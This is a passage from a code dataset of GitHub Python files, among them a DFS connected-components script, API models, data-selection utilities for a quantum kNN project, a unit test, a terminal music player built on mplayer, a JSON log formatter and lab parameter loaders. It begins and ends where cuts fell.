6)\nthreading.stack_size(10 ** 8)\n\n\ndef run():\n n, m = list(map(int, input().split(' ')))\n\n g = [[] for y in range(n)]\n\n for i in range(m):\n a, b = list(map(int, input().split(' ')))\n g[a-1].append(b-1)\n g[b-1].append(a-1)\n\n global_visited = [False] * n\n g_counts = [0] * n\n i = 0\n while i < n:\n if global_visited[i] == False:\n dots 
= []\n DFS(i, global_visited, g, -1, dots)\n g_counts[i] = len(dots)\n for dot in dots:\n g_counts[dot] = len(dots)\n i += 1\n\n print(*g_counts)\n\n\nthreading.Thread(target=run).start()","repo_name":"aimedvedeva/Algorithms","sub_path":"DFS/Connected Components.py","file_name":"Connected Components.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18256872748","text":"from copy import deepcopy\nfrom typing import Optional\nfrom datetime import datetime\n\nfrom apistrap.examples import ModelExample, ExamplesMixin\nfrom schematics import Model\nfrom schematics.types import StringType, BooleanType, ModelType, UUIDType, DateTimeType\n\n\nclass ModelModel(Model):\n \"\"\"\n Information about the model used for a job.\n \"\"\"\n name: Optional[str] = StringType(serialize_when_none=True)\n version: Optional[str] = StringType(serialize_when_none=True)\n\n\nclass SheepModel(Model):\n \"\"\"\n Information about a sheep.\n \"\"\"\n running: bool = BooleanType(required=True)\n model: ModelModel = ModelType(ModelModel, required=True)\n request: Optional[str] = UUIDType(serialize_when_none=True)\n\n\nclass ErrorModel(Model):\n \"\"\"\n Information about an error that occurred when processing a job.\n \"\"\"\n message: str = StringType(required=True)\n exception_type: str = StringType(required=False)\n exception_traceback: str = StringType(required=False)\n\n\nclass JobStatus:\n \"\"\"\n Used as an enum class that represents all possible states of a job.\n \"\"\"\n ACCEPTED = \"accepted\"\n QUEUED = \"queued\"\n PROCESSING = \"processing\"\n FAILED = \"failed\"\n DONE = \"done\"\n\n\nclass JobStatusModel(Model, ExamplesMixin):\n \"\"\"\n Status information for a job.\n \"\"\"\n status: JobStatus = StringType(required=True, choices=[*map(\n lambda m: getattr(JobStatus, m),\n filter(str.isupper, dir(JobStatus)))\n ])\n error_details: ErrorModel = ModelType(ErrorModel, required=False, default=None)\n model: ModelModel = ModelType(ModelModel, required=True)\n enqueued_at: datetime = DateTimeType(required=False)\n processing_started_at: datetime = DateTimeType(required=False)\n finished_at: datetime = DateTimeType(required=False)\n\n def copy(self) -> 'JobStatusModel':\n \"\"\"\n Make a deep copy of this object.\n\n :return: a deep copy of this object\n \"\"\"\n return JobStatusModel(deepcopy(self.to_primitive()))\n\n @classmethod\n def get_examples(cls):\n return [\n ModelExample(\"finished\", cls({\n \"status\": \"done\",\n \"model\": {\n \"name\": \"OCR model\",\n \"version\": \"1.0.42\"\n },\n \"enqueued_at\": datetime(2019, 1, 1, 12, 0),\n \"processing_started_at\": datetime(2019, 1, 1, 12, 10),\n \"finished_at\": datetime(2019, 1, 1, 12, 15)\n }), \"A job that finished successfully\"),\n ModelExample(\"pending\", cls({\n \"status\": \"queued\",\n \"model\": {\n \"name\": \"OCR model\",\n \"version\": \"1.0.42\"\n },\n \"enqueued_at\": datetime(2019, 1, 1, 12, 0)\n }), \"A job that waits to be processed\"),\n ModelExample(\"failed\", cls({\n \"status\": \"failed\",\n \"model\": {\n \"name\": \"OCR model\",\n \"version\": \"1.0.42\"\n },\n \"error_details\": {\n \"message\": \"An error occurred\",\n \"exception_type\": \"ValueError\",\n \"exception_traceback\": \"\"\"\n file.py: 23\n file_2.py: 47\n \"\"\"\n },\n \"enqueued_at\": datetime(2019, 1, 1, 12, 0),\n \"processing_started_at\": datetime(2019, 1, 1, 12, 10),\n \"finished_at\": datetime(2019, 1, 1, 12, 15)\n }), \"A job that failed to be 
processed\", \"Exception details are only included if shepherd was launched in debug mode\"),\n ]\n","repo_name":"iterait/shepherd","sub_path":"shepherd/api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"19779060359","text":"from sklearn.model_selection import train_test_split\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\n\nfrom sklearn.cluster import KMeans\nfrom kmodes.kmodes import KModes\n\nimport pandas as pd\nimport numpy as np\n\nfrom utility.binary_encodings.binary_econding import base_encode\n\n\ndef _transform(X, y, n_features_pca=None, normalize=False, standardize=False, test_size=0.3, enc_type=None, n_bits=0):\n\n X_new = X\n y_new = y\n if n_features_pca != None: \n pca_features = PCA(n_components=n_features_pca)\n X_new = pca_features.fit_transform(X_new)\n\n if standardize:\n scaler = StandardScaler().fit(X_new)\n X_new = scaler.transform(X_new)\n\n if normalize:\n X_new = preprocessing.normalize(X_new, axis=1)\n\n if enc_type != None:\n if n_bits <= 0:\n raise Exception('Invalid Number of n_bits')\n X_new, y_new = base_encode(X_new, y_new, n_features=n_features_pca, n_bits=n_bits, enc_type=enc_type)\n temp_df = pd.DataFrame(data=X_new, index=X.index)\n temp_df['target'] = y_new\n temp_df['target'] = temp_df.groupby([0])['target'].transform(lambda x: pd.Series.mode(x)[0])\n X_new = temp_df[0]\n y_new = temp_df['target']\n\n\n X_new = pd.DataFrame(X_new, index=X.index)\n X_train, X_test, y_train, y_test = train_test_split(X_new, y_new, test_size=test_size, random_state=42, stratify=y)\n return X_train, X_test, y_train, y_test \n\n\n\ndef _normalize(X_train, X_test):\n X_train = preprocessing.normalize(X_train, axis=1)\n X_test = preprocessing.normalize(X_test, axis=1)\n return X_train, X_test\n\ndef _standardize(X_train, X_test):\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n return X_train, X_test\n\ndef _apply_pca(X_train, X_test, n_features_pca):\n pca_features = PCA(n_components=n_features_pca)\n X_train = pd.DataFrame(pca_features.fit_transform(X_train), index=X_train.index)\n X_test = pd.DataFrame(pca_features.fit_transform(X_test), index=X_test.index)\n return X_train, X_test\n\ndef _select_test_sample(X_test, y_test, n_records_per_class=1, random_state=1):\n selected_X_test = []\n selected_y_test = []\n selected_test_indexes = y_test.sample(n=1, random_state=random_state)\n for index, _ in selected_test_indexes.items():\n selected_X_test.append(X_test.loc[index])\n selected_y_test.append(y_test.loc[index])\n return selected_X_test, selected_y_test, selected_test_indexes\n\ndef basis_selection_kmeans(X_train, X_test, y_train, y_test, n_records_per_class=1, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n for cl in df.target.unique():\n groupby_class = df.loc[df['target'] == cl]\n kmodes_on_class = KModes(n_clusters=n_records_per_class, random_state=0)\n kmodes_on_class.fit_predict(groupby_class.drop('target', 1))\n [selected_X_train.append(centroid) for centroid in kmodes_on_class.cluster_centroids_]\n [selected_y_train.append(cl) for i in range(len(kmodes_on_class.cluster_centroids_))]\n\n selected_X_test, selected_y_test, selected_test_indexes = 
_select_test_sample(X_test, y_test, random_state=random_state_test)\n\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\n\ndef selection_kmeans(X_train, X_test, y_train, y_test, n_records_per_class=1, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n for cl in df.target.unique():\n groupby_class = df.loc[df['target'] == cl]\n kmeans_on_class = KMeans(n_clusters=n_records_per_class, random_state=0)\n kmeans_on_class.fit(groupby_class.drop('target', 1))\n [selected_X_train.append(centroid) for centroid in kmeans_on_class.cluster_centers_]\n [selected_y_train.append(cl) for i in range(n_records_per_class)]\n\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\ndef basis_selection_mean(X_train, X_test, y_train, y_test, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n if len(discard_index_test):\n X_test.drop(discard_index_test, inplace=True)\n y_test.drop(discard_index_test, inplace=True)\n\n\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n highest_per_class = df.groupby('target')[0].apply(lambda x: x.value_counts().head(1))\n for multi_index,_ in highest_per_class.items():\n elem = multi_index[1]\n row = df[df[0]==elem].head(1)[0]\n row = pd.Series(row.squeeze()) \n target = df[df[0]==elem].head(1)['target']\n selected_X_train.append(np.array([row[0]]))\n selected_y_train.append(target.squeeze())\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\ndef selection_mean(X_train, X_test, y_train, y_test, random_state_test=1, discard_index_test=[]):\n selected_X_train = []\n selected_y_train = []\n if len(discard_index_test):\n X_test.drop(discard_index_test, inplace=True)\n y_test.drop(discard_index_test, inplace=True)\n\n\n df = pd.DataFrame(X_train, index=X_train.index)\n df['target'] = y_train\n means = df.groupby('target').mean()\n for target, row in means.iterrows():\n selected_X_train.append(row)\n selected_y_train.append(target)\n\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n return selected_X_train, selected_X_test, selected_y_train, selected_y_test, selected_test_indexes.index.values\n\n\ndef selection_random(X_train, X_test, y_train, y_test, n_records_per_class=1, random_state_training=1, random_state_test=1, discard_index_train=[], discard_index_test=[]): \n selected_X_train = []\n selected_y_train = []\n if len(discard_index_train):\n X_train.drop(discard_index_train, inplace=True)\n y_train.drop(discard_index_train, inplace=True)\n selected_X_test, selected_y_test, selected_test_indexes = _select_test_sample(X_test, y_test, random_state=random_state_test)\n selected_train_indexes = y_train.groupby(y_train).sample(n=n_records_per_class, random_state=random_state_training)\n for index, _ in selected_train_indexes.items():\n selected_X_train.append(X_train.loc[index])\n selected_y_train.append(y_train.loc[index])\n return selected_X_train, selected_X_test, 
selected_y_train, selected_y_test, selected_train_indexes.index.values, selected_test_indexes.index.values\n","repo_name":"Brotherhood94/quantum_knn","sub_path":"utility/selections.py","file_name":"selections.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"10046067261","text":"from unittest import mock, TestCase\n\nfrom envisage.api import Application\n\nfrom pyfibre.gui.pyfibre_plugin import PyFibreGUIPlugin\n\nMAIN_TASK = (\"pyfibre.gui.pyfibre_main_task\"\n \".PyFibreMainTask\")\nPLUGIN_SERVICE = 'envisage.api.Plugin.application.get_service'\n\n\ndef mock_return_none(*args, **kwargs):\n return\n\n\nclass TestWfManagerPlugin(TestCase):\n\n def setUp(self):\n self.pyfibre_plugin = PyFibreGUIPlugin()\n self.pyfibre_plugin.application = mock.Mock(spec=Application)\n\n def test_init(self):\n self.assertEqual(1, len(self.pyfibre_plugin.tasks))\n self.assertEqual(\n \"PyFibre GUI (Main)\",\n self.pyfibre_plugin.tasks[0].name,\n )\n","repo_name":"franklongford/PyFibre","sub_path":"pyfibre/gui/tests/test_pyfibre_plugin.py","file_name":"test_pyfibre_plugin.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"25039831426","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set et sw=4 ts=4 ft=python:\n\"\"\"play.py [-h|--help] [-m|--man] [-n|--notags]\n [-s|--sorted] [-e|--exact] [music-dir]\"\"\"\nfrom __future__ import print_function, unicode_literals\nimport mplayer\nimport os\nimport pprint\nimport random\nimport stat\nimport subprocess\nimport sys\nimport time\nimport mutagen\n\nimport qsio\n\n# --- default configuration ------\nDEFAULT_COLLECTION = \"/all/music/\"\n# --- end default configuration --\n\n\ndef usage(code, msg=''):\n if msg:\n print(\"** Error: \", msg)\n print(__doc__)\n # print(__doc__ % globals())\n sys.exit(code)\n\n\ndef help():\n usage(1)\n\n\ndef man():\n print(\"*play* \\tscript to choose subdirectory (artist)\\n\",\n \"\\tand play all music files contained (recursively looked up)\")\n print()\n print(\"[exact]\\tmeans that specified music-dir will be searched for\\n\",\n \"\\tsound files as a whole, no artist-subdir selection will occure\")\n print()\n print(\"[sorted]\\tdisables random shuffling,\\n\",\n \"\\tso songs are always played in the same alphab. 
sorted order\")\n print()\n help()\n\n\ndef get_opts(args):\n opts = {\n 'help': False,\n 'man': False,\n 'exact': False,\n 'music_dir': '',\n 'sorted': False,\n 'notags': False,\n }\n for opt in args[1:]:\n if opt == '-h' or opt == '--help':\n opts['help'] = True\n elif opt == '-m' or opt == '--man':\n opts['man'] = True\n elif opt == '-e' or opt == '--exact':\n opts['exact'] = True\n elif opt == '-s' or opt == '--sorted':\n opts['sorted'] = True\n elif opt == '-n' or opt == '--notags':\n opts['notags'] = True\n else:\n opts['music_dir'] = opt\n return opts\n\n\ndef sround(num, scale=0):\n try:\n return round(num, scale)\n except TypeError:\n return 0\n\n\ndef un(string):\n return string.decode('utf-8', 'ignore')\n\n\nclass SongInfo(object):\n def __init__(self, songpath, use_tags=True):\n self.path = songpath\n self.filename = os.path.basename(songpath)\n self.title = ''\n self.artist = ''\n self.album = ''\n self.length = None\n self.bitrate = None\n\n self._length_perc = 0\n\n if songpath:\n self._extract_info(songpath, use_tags)\n else:\n self._text = '- not found -'\n return\n\n extra = []\n if self.length:\n # l = u'%ds' % round(self.length)\n # extra.append(l)\n self._length_perc = self.length/100.0\n if self.bitrate:\n bt = self.bitrate\n bt = u'%dkbps' % (bt / 1000)\n extra.append(bt)\n extra_str = (', '.join(extra)) if extra else ''\n\n if not use_tags or not self.title:\n self._text = ('%s [%s]' % (\n self.filename,\n extra_str))\n else:\n self._text = ('%s - %s - %s [%s]' % (\n self.artist,\n self.album,\n self.title,\n extra_str))\n try:\n self._text_for_search = '%s %s' % (\n self.path.lower(),\n self._text.lower())\n except UnicodeDecodeError:\n print('Unable to process %s' % self.path)\n print('text %s' % self._text.lower())\n raise\n\n def __str__(self):\n return self._text\n\n def has_substr(self, substr):\n return substr in self._text_for_search\n\n def percent_pos(self, time_pos, raw=False):\n if time_pos is None:\n return '100'\n p = time_pos / self._length_perc\n if raw:\n return p\n return str(int(round(p)))\n\n def _extract_info(self, songpath, use_tags=True):\n song = mutagen.File(songpath, easy=True)\n if use_tags and getattr(song, 'tags', None):\n self.title = self._extract_field(\n song, ('title', 'TITLE'))\n self.artist = self._extract_field(\n song, ('artist', 'ARTIST'))\n self.album = self._extract_field(\n song, ('album', 'ALBUM', 'ALBUMTITLE'))\n if getattr(song, 'info', None):\n self.length = getattr(song.info, 'length', None)\n self.bitrate = getattr(song.info, 'bitrate', None)\n\n def _extract_field(self, song, field_names, default=''):\n if song.tags is None:\n return default\n for name in field_names:\n default = song.tags.get(name, default)\n if default:\n if isinstance(default, list):\n return default[0]\n return default\n\n\nclass Player(object):\n def __init__(self, music_dir, exact_folder=False, shuffle=True,\n show_tags=True):\n self._no_song = SongInfo('')\n self._player = mplayer.Player(args=('-novideo',),\n stderr=subprocess.STDOUT)\n self.music_dir = music_dir\n self.exact_folder = exact_folder\n self.shuffle = shuffle\n self.show_tags = show_tags\n self.volume_diff = 5\n self._last_vol = None\n self._cols = self._term_cols()\n self._songs = []\n\n self._pick_playlist()\n\n def _pick_playlist(self):\n self._changed = False\n self._last_info = None\n self._searching = None\n self._search_hit = self._no_song\n self._search_changed = False\n\n picked_music_dir = self.music_dir\n if not self.exact_folder:\n picked_music_dir = 
self._select_artist(picked_music_dir)\n print('\\rSelected directory: %s' % picked_music_dir)\n\n self._songs = self._load_songs(\n self._find_songs(picked_music_dir))\n\n print('\\rTotal %d songs' % len(self._songs))\n\n if self.shuffle:\n random.shuffle(self._songs)\n print('\\rShuffled song list.')\n else:\n self._songs = sorted(self._songs)\n\n def repick_playlist(self):\n print('')\n print('\\r')\n self._pick_playlist()\n self._current = -1\n self._finish_song()\n\n def _find_songs(self, dir_):\n supported = ('mp3', 'ogg', 'flv', 'flac', 'webm', 'mp4')\n songs = []\n dirs = [dir_]\n # print('searching for songs: 0')\n for dir_ in dirs:\n for sub in os.listdir(dir_):\n pathname = os.path.join(dir_, sub.decode('utf-8', 'ignore'))\n mode = os.stat(pathname)[stat.ST_MODE]\n if stat.S_ISDIR(mode):\n dirs.append(pathname)\n elif stat.S_ISREG(mode) and pathname.endswith(supported):\n songs.append(pathname)\n print('\\rfindings songs: {dirs} dirs, {files} files '\n .format(dirs=len(dirs), files=len(songs)),\n end='')\n print('')\n return songs\n\n def _load_songs(self, song_files):\n songs = []\n total = len(song_files)\n for song_file in song_files:\n songs.append(SongInfo(song_file, self.show_tags))\n print('\\rloading songs: {cur}/{total}'\n .format(cur=len(songs), total=total),\n end='')\n print('')\n return songs\n\n def _select_artist(self, dir_):\n subdirs = []\n for sub in os.listdir(dir_):\n pathname = os.path.join(dir_, sub)\n if os.path.isdir(pathname):\n subdirs.append(pathname)\n if not subdirs:\n return ''\n return random.choice(subdirs)\n\n def play(self):\n self._current = 0\n self._play_song()\n\n def _play_song(self):\n key_map = {\n '=': (self.volume_up,),\n '+': (self.volume_up,),\n '-': (self.volume_down,),\n '<': (self.jump_back5,),\n '>': (self.jump_fwd5,),\n 'e': (self.jump_end,),\n 'n': (self.next_song,),\n 'p': (self.prev_song,),\n 'i': (self.print_song_info,),\n 'q': (self.stop,),\n 'r': (self.reset_term,),\n 'P': (self._player.pause,),\n ' ': (self._player.pause,),\n 'l': (self.list_songs,),\n '~': (self.repick_playlist,),\n qsio.NonBlockingKeypress.KEY_INT: (self.stop,),\n }\n with qsio.NonBlockingKeypress(key_map) as keybd:\n keybd.reg_key('/', self._start_search, pass_backref=True)\n keybd.reg_key('h', lambda: self._show_keybindings(keybd))\n\n # whole playlist\n p = self._player\n while self.song and self.song.path:\n print(\"%s\\r\" % (self.song), end='')\n # FIXME(queria|later): ^^ what should be fixed here?\n p.loadfile(self.song.path)\n # wait till file is loaded\n while p.paused is None:\n time.sleep(0.1)\n _ = p.length # noqa\n # restore volume\n if self._last_vol is None:\n self._last_vol = p.volume\n p.volume = self._last_vol\n # play file\n if p.paused:\n p.pause()\n self._report_nowplaying()\n # whole song\n while self._playing_sleep():\n if not keybd.process_keys():\n self.stop()\n break\n self._current += 1\n print('\\r')\n self._clean_nowplaying()\n\n def _playing_sleep(self):\n if self._player.paused:\n time.sleep(0.4)\n else:\n time.sleep(0.1)\n if self._searching is not None:\n if self._search_changed:\n search_msg = 'search: %s => %s (%s)' % (\n self._searching,\n self._search_hit.path,\n self._search_hit)\n search_msg = search_msg.ljust(self._cols - 1)\n # self._search_changed = False\n # FIXME(queria): update has to be done twice\n # doing just one print() is for some reason\n # (not clear to me now) not enough, and screen\n # updated is delayed by one key press\n # - on \"first\" look it's not related to\n # qsio/playing_sleep loop\n # more 
like to stdout/console update\n # - adding print('x') before this print\n # does not helped!\n print('%s\\r' % search_msg, end='')\n return True\n if self._changed or self._player.percent_pos is None:\n self._changed = False\n return False\n paused = 'PAUSED' if self._player.paused else ''\n msg_format = \"[%d/%d] %s %s%% %s\"\n try:\n msg_data = (\n self._current + 1,\n len(self._songs),\n unicode(self.song),\n self.song.percent_pos(self._player.time_pos),\n paused)\n except UnicodeEncodeError as exc:\n msg_data = (\n self._current + 1,\n len(self._songs),\n str(exc),\n self.song.percent_pos(self._player.time_pos),\n paused)\n msg = msg_format % msg_data\n vol = '[vol=%s%%]' % sround(self._player.volume)\n\n msg_max_len = self._cols - len(vol) - 1\n if len(msg) > msg_max_len:\n msg = msg[:msg_max_len]\n print(\"%s%s\\r\" % (msg.ljust(msg_max_len), vol), end='')\n return True\n\n def _start_search(self, keybd):\n print('\\n')\n self._searching = ''\n keybd.passthrough(self._update_search)\n self._search_changed = True\n\n def _update_search(self, keybd, char):\n if char is None:\n return\n if ord(char) == 13: # enter\n wanted = self._search_hit\n self._stop_search(keybd)\n self.jump_to_name(wanted.path, move_in_queue=True)\n elif ord(char) == 27: # escape\n self._stop_search(keybd)\n else:\n self._search_changed = True\n if ord(char) == 127: # backspace\n self._searching = self._searching[:-1]\n else:\n self._searching += char\n self._searching = self._searching.lower()\n self._search_hit = self._no_song\n for song in self._songs:\n if song.has_substr(self._searching):\n self._search_hit = song\n break\n\n def _stop_search(self, keybd):\n self._search_changed = True\n self._searching = None\n self._search_hit = self._no_song\n keybd.passthrough(None)\n\n def _show_keybindings(self, keybd):\n print('\\r')\n keymap = keybd.dump_keymap()\n for key, actions in keymap.iteritems():\n actions_strs = []\n for action in actions:\n # actions_strs.append(str(dir(action['callback'])))\n if not hasattr(action['callback'], 'im_func'):\n # type(action['callback']) != 'instancemethod':\n continue\n actions_strs.append('%s' % (\n # action['callback'].im_class.__name__,\n action['callback'].im_func.__name__,\n ))\n\n print('\\r \"%s\" => %s' % (\n key,\n ', '.join(actions_strs)\n ))\n print('\\r')\n\n @property\n def song(self):\n try:\n return self._songs[self._current]\n except IndexError:\n # out of songs\n return None\n\n @property\n def songinfo(self, i_know_this_is_deprecated=False):\n if not i_know_this_is_deprecated:\n print('songinfo is deprecated, use just song now'\n ' or pass i_know_this_is_deprecated=True')\n info = self.song\n if not info:\n return self._no_song\n return info\n\n def volume_up(self):\n self._player.volume = min(\n 100,\n self._player.volume + self.volume_diff)\n self._last_vol = self._player.volume\n\n def volume_down(self):\n self._player.volume = max(\n 0,\n self._player.volume - self.volume_diff)\n self._last_vol = self._player.volume\n\n def next_song(self):\n if self._current + 1 == len(self._songs):\n self._current -= 1\n self._finish_song()\n\n def prev_song(self):\n self._current = max(-1, self._current - 2)\n self._finish_song()\n\n def stop(self):\n self._current = len(self._songs)\n self._finish_song()\n\n def jump_to(self, index, move_in_queue=False):\n if index < 0 or index >= len(self._songs):\n print('invalid index')\n return False\n if move_in_queue:\n # move the 'index' song\n # just behing current one\n self._songs.insert(\n self._current + 1,\n 
self._songs.pop(index))\n else:\n # just jump to position\n # before 'index' song\n self._current = index - 1\n # as finish_song will move one next after current\n self._finish_song()\n return True\n\n def jump_to_name(self, song_name, move_in_queue=False):\n if not song_name:\n return False\n for idx, song in enumerate(self._songs):\n if song_name == song.path:\n return self.jump_to(idx, move_in_queue)\n return False\n\n def jump_end(self):\n try:\n self._player.time_pos = self._player.length - 10\n except TypeError:\n pass # weird float error in mplayer.py?\n\n def jump_time(self, steptime=0, stepcount=1):\n try:\n while stepcount > 0:\n self._player.time_pos = max(\n 0.0, self._player.time_pos + steptime)\n stepcount -= 1\n except TypeError as exc:\n print('Ouch: %s', exc)\n\n def jump_fwd5(self):\n self.jump_time(steptime=5, stepcount=1)\n\n def jump_back5(self):\n self.jump_time(steptime=-5, stepcount=1)\n\n def reset_term(self):\n self._cols = self._term_cols()\n\n def _finish_song(self):\n try:\n self._player.time_pos = self._player.length\n except TypeError:\n pass # weird float error in mplayer.py?\n self._changed = True\n\n def print_song_info(self):\n print('\\r')\n if self._player.metadata:\n md = self._player.metadata\n for k, v in md.iteritems():\n print(' %s: %s\\r' % (k, v))\n if self._player.length is not None:\n print(' length: %s\\r' % self.song.length)\n print(' length_perc: %s\\r' % self.song.percent_pos(1, raw=True))\n print(' current_pos: %s\\r' % self._player.time_pos)\n print('file: %s\\r' % self.song.path)\n\n def list_songs(self, printout=True):\n if not printout:\n return self._songs\n print('')\n print('\\n\\r'.join([\n ('%s (%s)%s' % (\n s.path,\n s,\n ' <================' if s == self.song else ''\n ))\n for s in self._songs]))\n print('\\n\\r', end='')\n\n def _term_cols(self):\n (rows, cols) = subprocess.check_output(['stty', 'size']).split()\n return int(cols)\n\n def _report_nowplaying(self):\n with open(os.path.expanduser('~/.nowplaying'), 'w') as np_file:\n np_file.write(unicode(self.song).encode('utf-8'))\n\n def _clean_nowplaying(self):\n os.remove(os.path.expanduser('~/.nowplaying'))\n\n\ndef main():\n reload(sys)\n sys.setdefaultencoding('utf-8')\n opts = get_opts(sys.argv)\n if opts['help']:\n help()\n if opts['man']:\n man()\n music_dir = opts['music_dir']\n if not music_dir:\n music_dir = DEFAULT_COLLECTION\n if not os.path.isdir(music_dir):\n usage(1, \"Music directory ({}) doesn't exists!\\n\".format(music_dir))\n\n p = Player(\n os.path.abspath(music_dir),\n exact_folder=bool(opts['exact']),\n shuffle=(not bool(opts['sorted'])),\n show_tags=(not bool(opts['notags'])),\n )\n p.play()\n\n\nif __name__ == '__main__':\n try:\n main()\n except (OSError, KeyboardInterrupt) as e:\n print(\"... 
koncim\")\n","repo_name":"queria/play","sub_path":"play2.py","file_name":"play2.py","file_ext":"py","file_size_in_byte":18400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"71302162402","text":"import logging\n\nclass LogFormatter(logging.Formatter):\n def format(self, record):\n timestamp = self.formatTime(record, \"%Y-%m-%d %H:%M:%S\")\n level = record.levelname\n logger = record.name\n message = record.getMessage().replace('\"', '\\\\\"')\n log_entry = {\n \"timestamp\": timestamp,\n \"level\": level,\n \"logger\": logger,\n \"message\": message\n }\n return f'{{\"timestamp\":\"{timestamp}\", \"level\":\"{level}\", \"logger\":\"{logger}\", \"message\":\"{message}\"}}'\n\ndef log(logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n\n handler = logging.StreamHandler()\n formatter = LogFormatter()\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n\n return logger\n","repo_name":"jerichosiahaya/RELP","sub_path":"config/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18031550211","text":"from collections import OrderedDict\n\nimport numpy as np\n\nimport config\n\n\nclass Parameters(object):\n \"\"\"For a given run index, determine the type of run\n (single layer / two layer) and load the appropriate\n parameters.\n\n An instance of this class is a function that returns\n a (ordered) dictionary of the run parameters.\n \"\"\"\n # TODO: this path should be in init or config or somewhere else\n root = config.default_root\n single_layer_parameters = config.single_layer_parameters\n two_layer_parameters = config.two_layer_parameters\n\n single_layer_headers = [('run_index', '|S10'),\n ('H', np.float),\n ('D', np.float),\n ('L', np.float),\n ('rho_ambient', np.float),\n ('rho_lock', np.float),\n ('T_ambient', np.float),\n ('T_lock', np.float),\n ('n_sample_ambient', np.float),\n ('n_sample_lock', np.float),\n ('T_sample_ambient', np.float),\n ('T_sample_lock', np.float),\n ]\n\n two_layer_headers = [('run_index', '|S10'),\n ('H', np.float),\n ('D', np.float),\n ('L', np.float),\n ('h_1 / H', np.float),\n ('rho_upper', np.float),\n ('rho_lower', np.float),\n ('rho_lock', np.float),\n ('T_upper', np.float),\n ('T_lower', np.float),\n ('T_lock', np.float),\n ('n_sample_upper', np.float),\n ('n_sample_lower', np.float),\n ('n_sample_lock', np.float),\n ('T_sample_upper', np.float),\n ('T_sample_lower', np.float),\n ('T_sample_lock', np.float),\n ]\n\n def __init__(self, run_index=None):\n self.init_parameters()\n\n def __call__(self, run_index):\n run_type = self.determine_run_type(run_index)\n if run_type == 'single layer':\n return self.get_run_info(self.single_layer, run_index)\n elif run_type == 'two layer':\n return self.get_run_info(self.two_layer, run_index)\n else:\n return None\n\n def get_run_info(self, parameters, index):\n \"\"\"Return the info for a given run index as an\n OrderedDict.\n \"\"\"\n line = np.where(parameters['run_index'] == index)\n info = parameters[line]\n keys = info.dtype.names\n values = info[0]\n odict = OrderedDict(zip(keys, values))\n odict['run type'] = self.determine_run_type(index)\n return odict\n\n def determine_run_type(self, run_index):\n \"\"\"Returns the run type as a string, either\n 'two_layer' or 'single_layer'.\n \"\"\"\n if run_index in self.single_layer['run_index']:\n return 'single layer'\n elif 
run_index in self.two_layer['run_index']:\n return 'two layer'\n else:\n return None\n\n def init_parameters(self):\n \"\"\"Load the parameters files.\"\"\"\n self.single_layer = self.load_parameters(self.single_layer_parameters,\n self.single_layer_headers)\n self.two_layer = self.load_parameters(self.two_layer_parameters,\n self.two_layer_headers)\n\n @staticmethod\n def load_parameters(file, headers):\n return np.loadtxt(file, dtype=headers, skiprows=2)\n\n\nclass BaseAttributes(object):\n # data vertical step (m)\n dz = 0.00116\n # data horizontal step (m)\n dx = 0.00144\n # data time step (s)\n dt = 0.01\n\n\nclass ProcessedVectors(object):\n # the names of the attributes that an instance should have\n # after running self.execute()\n vectors = [('X', np.float32), # streamwise coordinates\n ('Z', np.float32), # vertical coordinates\n ('T', np.float32), # time coordinates\n ('U', np.float32), # streamwise velocity\n ('V', np.float32), # cross stream velocity\n ('W', np.float32), # vertical velocity\n ]\n vectors = np.dtype(vectors)\n\n\nclass AnalysisVectors(object):\n vectors = [('X', np.float32), # streamwise coordinates\n ('Z', np.float32), # vertical coordinates\n ('T', np.float32), # time coordinates\n\n ('x', np.float32), # streamwise coordinates (single vector)\n ('z', np.float32), # vertical coordinates (single vector)\n ('t', np.float32), # time coordinates (single vector)\n\n ('U', np.float32), # streamwise velocity\n ('V', np.float32), # cross stream velocity\n ('W', np.float32), # vertical velocity\n\n # ('fx', np.float32), # front detection in space\n # ('ft', np.float32), # front detection in time\n ('front_speed', np.float32), # LAB coord front speed\n\n # Waves (LAB coords)\n # (U = U - wU - wUr - Ubg)\n ('wU', np.float32), # streamwise waves (fitted)\n ('wW', np.float32), # vertical waves (fitted)\n\n ('wUr', np.float32), # streamwise waves (remainder)\n ('wWr', np.float32), # vertical waves (remainder)\n\n ('Ubg', np.float32), # background in u\n ('Wbg', np.float32), # background in w\n\n # __FRONT coords\n ('Xf', np.float32), # front relative streamwise coords\n ('Zf', np.float32), # front relative vertical coords\n ('Tf', np.float32), # front relative time coords\n\n ('xf', np.float32), # 